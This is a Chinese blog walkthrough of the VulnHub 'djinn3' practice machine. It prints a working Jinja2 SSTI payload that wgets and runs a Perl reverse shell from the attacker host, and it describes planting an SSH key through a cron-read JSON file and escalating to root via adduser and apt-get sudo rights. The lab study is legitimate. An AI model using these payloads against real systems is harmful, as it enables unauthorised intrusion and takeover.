djinn3 vulnhub 靶机渗透

最新推荐文章于 2023-04-15 20:30:00 发布
最新推荐文章于 2023-04-15 20:30:00 发布
阅读量3.1k 收藏 1
点赞数
分类专栏: 靶机渗透 web 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrwangtw/article/details/122619536
版权

靶机ip10.0.2.45,攻击机ip10.0.2.4

扫描靶机端口

进入80端口,没发现什么可用的信息

进入5000端口,这里查看所有的title内容,没发现什么可用的信息,看了大佬的博客,发现可用的用户guest

访问31337端口,发现

考虑有nc命令访问端口,发现可用guest去登录,密码也是guest

这里发现这里增加和删除的ticket就是5000端口的内容

 

 

 反复测试发现存在ssti漏洞

 

 这里是判断ssti模板引擎的方法,具体内容在这里

 

 

 以上结果说明ssti引擎是jinja2,网上搜集jinja2的反弹shell,网站是这里,搜索ssti的payload,得到

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

 我们把id改成wget,然后加上我们攻击机的反弹shell文件,我这里最先用的是php的反弹shell,发现有问题,就换成了perl,注意要改下文件里的ip和端口

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('wget http://10.0.2.4/perl-reverse-shell.pl;perl perl-reverse-shell.pl')|attr('read')()}}

然后把上面的内容放在31337端口新建的ticket里面,kali用python开启http服务,然后进入5000端口,点击link即可得到shell

 

 然后把pspy64上传到靶机的tmp目录里,pspy64是检测主机的进程工具,运行

发现存在两个py文件,搜索saint的文件

find / -user saint 2>/dev/null

 

 然后把上面两个文件的内容复制下来,放在靶机的文件里进行反编译。这里有难度的就是如何复制文件的完整内容,看了大佬的内容学会了基本操作,首先复制文件的十六进制的内容

xxd .configuration.cpython-38.pyc

 然后把显示出的东西都复制放在kali文件里,再就是十六进制转换成二进制。

xxd -r configure.pyc >> configure1.pyc

 另一个pyc文件的复制操作也同上,然后进入在线网站进行反编译

 有些代码看的不是很懂,看了大佬的解释,基本明白了。

新建一个以当下时间的文件,例如,21-1-2022.json,内容如下

{
        "URL":"http://10.0.2.4/authorized_keys",
        "Output":"/home/saint/.ssh/authorized_keys"
}

用ssh-keygen工具生成id_rsa.pub和id_rsa文件,keys文件就是id_rsa.pub的内容,然后kali开启http服务(这里由于靶机创建文件比较难,可以考在kali新建json文件,然后靶机去下载)

等待片刻,进入kali的/root/.ssh目录下,直接连接saint用户即可

 进入之后查看权限

存在一个增加用户的权限,添加一个root用户组的用户

 

 查看sudo用户

 发现存在一个jason的用户,可以执行apt-get的权限,但是查看passwd文件发现不存在这个用户,但是我们可以利用saint用户的adduser的权限增加一个jason用户,操作同上,然后登录

 网站gtfobins搜索apt-get的sudo提权方法,得到

测试之后发现第一个不可行,第三个方法可行

 

 直接运行sh文件

 

mrwangtw
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透测试实战(一)——熟悉渗透测试流程的简单测试
橘子女侠
05-09 1万+
本篇文章不注重于渗透测试,而在于将之前学习过的方法加以熟悉; 1. 实验环境 靶机:CentOS 6.7,IP地址为:192.168.37.137 攻击机:Kali,IP地址为:192.168.37.131 运行环境:VMware 2. 实验步骤 信息收集 (1)查询攻击机Kali的IP地址; (2)识别存活的主机,发现攻击的目标 (注:二、三、四层发现的目的都是识别...
Vulnhub-djinn3
KAKA的博客
07-18 1102
与 1 和 2 相同,开机即可得到 djinn3 的 IP地址:192.168.67.14 获取相关信息:nmap -A -p- 192.168.67.14 22 ---> ssh --> open 80 ---> http --> open 5000 ---> http --> open 31337 ---> open --> open 探测 80 端口 先看看刚刚 nmap 有没有扫出什么东西: 可得到服务端是 lighttp.
vulnhub靶机-djinn3
臭nana的博客
07-01 1633
1、靶机ip:192.168.0.110(开机就提示:不是所有的都需要扫描发现主机) 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.0.110 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.110 Host is up (0.0011s latency). Not shown: 65531 closed ports PORT STATE SERVICE V
vulnhub靶机-djinn
臭nana的博客
06-27 910
1、找到靶机ip:192.168.0.108
实战打靶集锦-015-djinn3
最新发布
阿尔泰野狼的博客
04-15 630
本文记录了博主的一次曲折打靶经历,包含SSTI注入、.pyc文件反编译、CVE-2022-2588提权、apt-get提权等多种手法。
靶机系列测试 djinn1
08-03
介绍2.1 靶机介绍描述说明The machine is VirtualBox as well as VMWare compatible. The DHCP w
djinn:Djinn分割键盘
04-11
Djinn分割键盘 Djinn是64键分割键盘-双4x7和4键拇指群集。 拇指下方还有一个5向触觉开关。 在奢侈方面,它具有音频,编码器支持,每键RGB和RGB余辉...以及240x320 LCD。 为了安全起见,它在USB连接器和分离式传输...
开源项目-thrisp-djinn.zip
09-05
开源项目-thrisp-djinn.zip,Djinn 1.0: html templating built on standard library html/template
Python库 | djinn_core-1.2.4.tar.gz
05-14
资源分类:Python库 所属语言:Python 资源全名:djinn_core-1.2.4.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | djinn_events-1.0.3.tar.gz
04-08
资源分类:Python库 所属语言:Python 资源全名:djinn_events-1.0.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
pspy:在没有root权限的情况下监视linux进程
03-31
pspy-无特权Linux进程监听 pspy是一种命令行工具,旨在无需根权限就可以窥探进程。 它允许您在其他用户执行命令时查看它们,cron作业等。 非常适合枚举CTF中Linux系统。 很好地向您的同事展示为什么在命令行中将秘密作为参数传递是一个坏主意。 该工具从procfs扫描中收集信息。 放置在文件系统选定部分上的Inotify观察程序将触发这些扫描,以捕获短暂的进程。 入门 下载 将工具安装到要检查Linux机器上。 首先获取二进制文件。 在此处下载发布的二进制文件: 32位大,静态版本: pspy32 64位大,静态版本: pspy64 32位小版本: pspy32s 64位小版本: pspy64s 静态编译的文件应可在任何Linux系统上使用,但容量很大(〜4MB)。 如果有大小问题,请尝试较小的版本,该版本取决于libc并使用UPX(〜1MB)压缩。 建造 您可以使用系
靶机渗透-Vulnhub-Lampiao
dahege666的博客
08-30 143
靶机: IP:192.168.239.139 攻击机: IP:192.168.239.131 确认目标主机后,使用nmap进行端口扫描,开放了三个端口 访问一下80端口,没什么东西 还有一个1898端口,访问,发现是一个drupal7 cms 目录扫描发现changelog文件 最新一次更新是17年7.54版本 打开msf之后,输入search drupal,搜索其相关的漏洞利用模块,其中有一个18年的CVE-2018-7600 Drupal 7.x 版本代码执行 ..
OSCP-1-6-djinn3(Werkzeup、Flask、SSTI漏洞、wget下载perl脚本反弹、adduser、root组用户、sudoers文件泄露信息、apt-get提权)
墨痕诉清风的博客
08-07 138
根据这两个python程序的源码,在/tmp下新建一个文件,文件名字为29-06-2020.config.json,内容如下,本地服务器的authorized_keys文件的内容是使用ssh-keygen生成的id_rsa.pub文件内容。,查看还有哪些用户可以使用sudo执行命令,发现一个jason用户,但是这个用户并不存在,但是我们是可以新建用户的,所以需要密码(自己的密码)才能执行这个也就没有问题。这里有难度的就是如何复制文件的完整内容,看了大佬的内容学会了基本操作,记住,依次查看用户可写文件。...
靶机渗透SickOs1.2(非常详细,适合新手渗透
君莫hacker的博客
09-08 6969
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
靶机渗透练习93-hacksudo:1.0.1
hirak0的博客
05-06 2174
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-101,650/ Description N/A This works better with VirtualBox rather than VMware ## Changelog 2021-04-04 - v1.0.1 2021-02-22 - v1.0.0 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.3 靶机: IP地址:192.168.9.12 注:靶机与Kali的IP地
Vulnhub靶机渗透 -- DJINN: 1
miko's blog
11-03 289
Vulnhub靶机渗透 — DJINN: 1 0x00 前言: 介系一个及其简单的靶机 非常适合新玩家对她进行渗透 (可以从这里下哦) 啊是的没了,就这些 0x01 信息收集: 进行常规的靶机安装操作后(还是用的VirtualBox),可以发现这台靶机是非常贴心的,已经告诉我们ip了,就不需要我们直接再去扫网段了 简单地用nmap扫描一下能够获得大部分内容 可以发现ssh是被过滤的,我的脑袋瓜啊一下子就想到了knockd,但是重新用sV扫全端口还是不对,要么就是没有这个漏洞,要么就是端口顺序不对 由于
Linux系统监控工具详解
3369的博客
09-26 473
系统监控: proc文件系统: proc文件系统是一种无存储的文件系统,当读其中的文件时,其内容动态生成,当写文件时,文件所关联的写函数被调用。每个proc文件都关联着字节特定的读写函数,因而它提供了另外的一种和内核通信的机制:内核部件可以通过该文件系统向用户空间提供接口来提供查询信息、修改软件行为,因而它是一种比较重要的特殊文件系统 由于proc文件系统以文件的形式向用户空间提供了访问接口,这些接口可以用于在运行时获取相关部件的信息或者修改部件的行为,因而它是非常方便的一个接口。内核中大量使用了该文件系统
Meta靶机
weixin_45007073的博客
02-28 1543
信息收集 发现目标主机只开放了ssh和web服务
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
weixin_62621015的博客
04-03 474
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
VulnHub靶场----grotesque3
qq_61670993的博客
10-19 441
本人小菜鸡,希望一起学习进步!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值